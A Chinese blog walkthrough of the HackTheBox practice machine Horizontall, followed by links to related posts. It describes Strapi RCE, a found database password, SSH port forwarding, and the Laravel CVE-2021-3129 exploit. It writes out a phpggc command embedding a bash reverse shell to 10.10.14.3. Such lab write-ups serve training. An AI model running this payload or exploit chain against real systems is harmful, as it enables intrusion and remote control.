HackTheBox | Horizontall

原创 已于 2022-09-01 22:02:28 修改 · 1k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

于 2022-08-08 11:01:12 首次发布
本文讲述了通过nmap扫描发现开放的22、80端口,80端口对应Horizontall站点。进一步利用dirsearch、JS文件中的域名、Strapi CMS及Googleexp找到RCE入口。尽管无回显,但通过SSH公钥写入与端口转发,访问到Laravel服务并利用CVE-20XX获得root权限,最终反弹shell。

Horizontall

nmap扫描,开放22、80,80对应站点http://horizontall.htb

image-20220808083848092

访问80

image-20220808084055211

dirsearch扫描,也没有东西

image-20220808084601072

看wp之后发现在response的js文件里,有一个新的域名,虽然我仍然没找到

image-20220808085949263

修改hosts文件之后访问http://api-prod.horizontall.htb/

image-20220808090150591

找到一个admin路径,访问之后跳转到认证页面,使用了strapiCMS

image-20220808090419973

熟悉的套路就是Google exp,然后就找到了RCE

image-20220808091104100

使用脚本,成功RCE,但是是无回显

image-20220808091652191

直接反弹shell

image-20220808092652645

image-20220808092707362

检查/etc/passwd,看到developer用户

image-20220808092814117

strapi用户可以直接读取developer用户家目录下的user.txt

检查本地,存在MySQL

image-20220808094338813

尝试寻找MySQL数据库登录方式,在/opt/strapi/myapi/config/environments/development下的database.json中找到一堆账号密码developer/#J!:F9Zt2u

image-20220808094557891

但是该密码无法登录developer的ssh,还是从数据库入手。最终在数据库中找到strapi的管理员密码的密文值。

image-20220808095128616

上john爆破也没爆出来

image-20220808104102013

回顾前面的内容,发现本地还开放了13378000。探测这两个端口的服务,发现8000开放Lavarel

image-20220808100450552

写ssh公钥,用于之后的端口转发

本地ssh-keygen生成id_rsa.pub,然后将id_rsa.pub的内容写入strapi家目录下的.ssh/authorized_keys

本地设置ssh端口转发,将10.10.11.105主机上127.0.0.1:8000转发到本地的8000端口

image-20220808103125791

当再去访问本地的8000时,就访问到了10.10.11.105的8000端口上的Laravel服务,版本为v8

image-20220808103230081

Laravel存在CVE,之前的某道题中用到过,所以直接找exp进行利用了

https://github.com/ambionics/laravel-exploits

直接拿到root权限

image-20220808105019784

反弹shell

php -d'phar.readonly=0' ./phpggc --phar phar -o /tmp/exploit.phar --fast-destruct monolog/rce1 system "/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.3/1234 0>&1'"

image-20220808105710180

0x02 HackTheBox系列之Horizontall
boss111的专栏
01-08 3091
1. 环境搭建 主机 IP地址 Horizontall 10.10.11.105 Kali 10.10.16.5 目标:获取用户主目录下的 user.txt 和 ROOT 主目录下的 root.txt 2. 信息收集 2.1 端口扫描 利用NMAP进行端口扫描: nmap -sV -A -p- 10.10.11.104 2.2 Web探测 2.3 目录爆破 利用 gobuster 目录/文件探测: gobuster dir -u http://horizontall.
CTF-Horizontall HackTheBox渗透测试(一)
小陈的博客
08-09 598
*#Horizontall#难度是一个相对“简单”的 CTF Linux盒子。该CTF环境涵盖了通过利用Strapi RCE 漏洞并使用内部应用程序(Laravel) 将隧道传输到本地计算机,并且在 Laravel v 7.4.18 上运行 漏洞PoC最来提升权限拿到root用户权限。**
HackTheBox-Horizontall WP
h1nt的博客
09-07 1953
0x01 准备 该靶机设置了域名,需要手动在host文件配置ip地址。 配置完成后即可访问靶机。看到vue的图标也就不难看出这是一个前后端分离的网站,我们的目标应该主要放在后端的接口上。 0x02 user.txt 我安装的burp插件帮我找到了一个子域名,同样我们需要将其录入hosts文件中绑定靶机的ip,这样才能正常访问: 如下即可: 访问得到结果,但是不是我们想要的东西,我们可以通过目录扫描的方式查找接口: 对主域名horizontall.htb的目录扫描没有发现有用的
CVE-2021-3129:Laravel调试RCE
05-26
CVE-2021-3129 Laravel debug rce 食用方法 执行docker-compse up -d启动环境 访问8888端口后点击首页面的generate key就可以复现了 关于docker环境想说的几点: 把.env.example复制到.env作用是开启debug环境 关闭了php.ini的phar.readonly 在resources/view/里添加了一个hello模板并引用了一个未定义变量,同时在routes/web.php添加路由(这个我加在源码里了,没写dockerfile里) 复现效果 脚本已放出,脚本要和phpggc项目文件夹在同一级目录下。 通用性不强(至少打我自己的环境可以),大家可自行把phpggc的其它rce链也加进去,提高通杀能力。 参考资源
laravel-exploits:针对CVE-2021-3129的漏洞利用
05-25
laravel漏洞 漏洞利用CVE-2021-3129详细信息: ://www.ambionics.io/blog/laravel-debug-rce 用法 $ php -d ' phar.readonly=0 ' ./phpggc --phar phar -o /tmp/exploit.phar --fast-destruct monolog/rce1 system id $ ./laravel-ignition-rce.py http://localhost:8000/ /tmp/exploit.phar Log file: /work/pentest/laravel/laravel/storage/logs/laravel.log Logs cleared Successfully converted to PHAR ! Phar deserialized -----------
HackTheBox 简单盒子 之 Horizontall (again,不简单)
rainrinser的博客
12-29 3825
1. Gobuster vhost + top1million wordlist 做 subdomain enum 2. ssh公钥制作,远程登陆 3. ssh端口转发 4. RCE理解
0x11-HackTheBox-Beep
0pr
05-26 460
目录 历史命令 目标 能学到什么? 什么是 Elastix? 什么是 FreePBX? Elastix FreePBX 远程代码执行漏洞 Nmap Rpcclient Smbclient Enum4linux Nmap Read More Ldapsearch Sambe on 139,445 Rpc DNS on 53 Kerberos on 88 Evil-winrm Foothold Privilege Escalation Manual Enumeration PowerView.p
【Hack The Box】linux练习-- Horizontall
人间体佐菲的博客
11-28 614
【Hack The Box】linux练习-- Horizontall
CTF-Anubis HackTheBox 渗透测试(二)
hongrisec的博客
10-19 977
大家好,我是你们好朋友小峰。预计从今天开始,陆陆续续为大家推出 CTF-Horizontall HackTheBox 系列文章。
精选资源
hackthebox注册教程
01-20
官方网址:https://www.hackthebox.eu/ hackthebox是一个靶场,听说和vulnhub很像,最近迷上了做靶场,于是就像去hackthebox看看,发现还是注册,而且注册好像还没有那么简单 在首页的最下面有个join,进行点击 发现...
精选资源
Hack The Box 是一个非常受欢迎的在线平台,主要面向网络安全爱好者、专业渗透测试人员以及希望提升自己在网络安全领域技能
06-22
Hack The Box 是一个非常受欢迎的在线平台,主要面向网络安全爱好者、专业渗透测试人员以及希望提升自己在网络安全领域技能的学生。它提供了一个安全且合法的环境,让参与者能够实践他们的黑客技能,而不必担心法律...
Hack the box的Easy难度比较有价值的靶机.rar
11-04
"Hack the Box"(HTB)是一个在线平台,提供各种虚拟靶机,让安全专家和爱好者通过模拟真实世界的攻击场景来提升自己的技能。这个“Easy”难度级别的靶机是为初学者设计的,旨在帮助他们入门渗透测试的基础知识。 ...
精选资源
Stego-Challenges-HackTheBox-Write-Ups:Hack The Box带来的Stego挑战| Walkthoughs写ups
03-21
在IT安全领域,尤其是黑客挑战平台如Hack The Box(HTB)中,"Stego"是一种常见的挑战类型,它涉及到隐藏信息的技术,通常被称为隐写术。隐写术是一种利用图像、音频、文本等载体秘密传输信息的方法。在这个特定的...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8859
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
NSIS安装生成log,卸载调用log卸载
01-03
代码转载自:https://pan.quark.cn/s/f87b8041184b Language: 中文 欢迎来到戈戈圈! 当你点开这个存储库的时候,你会看到戈戈圈的图标↓ 本图片均在知识共享 署名-相同方式共享 3.0(CC BY-SA 3.0)许可协议下提供,如有授权遵照授权协议使用。 那么恭喜你,当你看到这个图标的时候,就代表着你已经正式成为了一名戈团子啦! 欢迎你来到这个充满爱与希望的大家庭! 「与大家创造更多快乐,与人们一起改变世界。 」 戈戈圈是一个在中国海南省诞生的创作企划,由王戈wg的妹妹于2018年7月14日正式公开。 戈戈圈的创作类型广泛,囊括插画、小说、音乐等各种作品类型。 戈戈圈的目前成员: Contributors 此外,支持戈戈圈及本企划的成员被称为“戈团子”。 “戈团子”一词最初来源于2015年出生的名叫“团子”的大熊猫,也因为一种由糯米包裹着馅料蒸熟而成的食品也名为“团子”,不仅有团圆之意,也蕴涵着团结友爱的象征意义和大家的美好期盼,因此我们最终于2021年初决定命名戈戈圈的粉丝为“戈团子”。 如果你对戈戈圈有兴趣的话,欢迎加入我们吧(σ≧︎▽︎≦︎)σ! 由于王戈wg此前投稿的相关视频并未详细说明本企划的信息,且相关视频的表述极其模糊,我们特此创建这个存储库,以文字的形式向大家介绍戈戈圈。 戈戈圈自2018年7月14日成立至今,一直以来都秉持着包容开放、和谐友善的原则。 我们深知自己的责任和使命,始终尊重社会道德习俗,严格遵循国家法律法规,为维护社会稳定和公共利益做出了积极的贡献。 因此,我们不允许任何人或组织以“戈戈圈”的名义在网络平台或现实中发布不当言论,同时我们也坚决反对过度宣传戈戈圈的行为,包括但不限于与戈戈圈无关的任何...
医疗AI基于YOLOv8的血细胞检测系统设计:实现血液细胞自动识别与临床辅助诊断
01-03
内容概要:本文详细介绍了一个基于YOLOv8的血细胞智能检测系统全流程开发指南,涵盖从环境搭建、数据准备、模型训练与验证到UI交互系统开发的完整实践过程。项目利用YOLOv8高精度、高速度的优势,实现对白细胞、红细胞和血小板的自动识别与分类,准确率超过93%,单张图像检测仅需0.3秒。通过公开或自建血细胞数据集,结合LabelImg标注工具和Streamlit开发可视化界面,构建了具备图像上传、实时检测、结果统计与异常提示功能的智能系统,并提供了论文撰写与成果展示建议,强化其在医疗场景中的应用价值。; 适合人群:具备一定Python编程与深度学习基础,从事计算机视觉、医疗AI相关研究或项目开发的高校学生、科研人员及工程技术人员,尤其适合需要完成毕业设计或医疗智能化项目实践的开发者。; 使用场景及目标:①应用于医院或检验机构辅助医生进行血涂片快速筛查,提升检测效率与一致性;②作为深度学习在医疗影像领域落地的教学案例,掌握YOLOv8在实际项目中的训练、优化与部署流程;③用于学术论文写作与项目成果展示,理解技术与临床需求的结合方式。; 阅读建议:建议按照“数据→模型→系统→应用”顺序逐步实践,重点理解数据标注规范、模型参数设置与UI集成逻辑,同时结合临床需求不断优化系统功能,如增加报告导出、多类别细粒度分类等扩展模块。
基于蒙特卡洛,copula函数,fuzzy-kmeans获取6个典型场景进行随机优化多类型电动汽车采用分时电价调度,考虑上级电网出力、峰谷差惩罚费用、风光调度、电动汽车负荷调度费用和网损费用
最新发布
01-03
基于蒙特卡洛,copula函数,fuzzy-kmeans获取6个典型场景进行随机优化多类型电动汽车采用分时电价调度,考虑上级电网出力、峰谷差惩罚费用、风光调度、电动汽车负荷调度费用和网损费用内容概要:本文围绕多类型电动汽车在分时电价机制下的优化调度展开研究,采用蒙特卡洛模拟、Copula函数和模糊K-means聚类方法获取6个典型场景,并在此基础上进行随机优化。模型综合考虑了上级电网出力、峰谷差惩罚费用、风光可再生能源调度、电动汽车负荷调度成本以及电网网损费用等多个关键因素,旨在实现电力系统运行的经济性与稳定性。通过Matlab代码实现相关算法,验证所提方法的有效性与实用性。; 适合人群:具备一定电力系统基础知识和Matlab编程能力的研究生、科研人员及从事新能源、智能电网、电动汽车调度相关工作的工程技术人员。; 使用场景及目标:①用于研究大规模电动汽车接入电网后的负荷调控策略;②支持含风光等可再生能源的综合能源系统优化调度;③为制定合理的分时电价政策及降低电网峰谷差提供技术支撑;④适用于学术研究、论文复现与实际项目仿真验证。; 阅读建议:建议读者结合文中涉及的概率建模、聚类分析与优化算法部分,动手运行并调试Matlab代码,深入理解场景生成与随机优化的实现流程,同时可扩展至更多元化的应用场景如V2G、储能协同调度等。
富士施乐专用文档浏览器,查看dw格式
01-03
根据原作 https://pan.quark.cn/s/516ea913e59d 的源码改编 该软件较为少见,主要用于处理xerox设备扫描生成的文档,同时也适用于基于此工具创建的文件
wufanjames_python-cpp_34836_1767245533859.zip
01-03
wufanjames_python-cpp_34836_1767245533859.zip
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值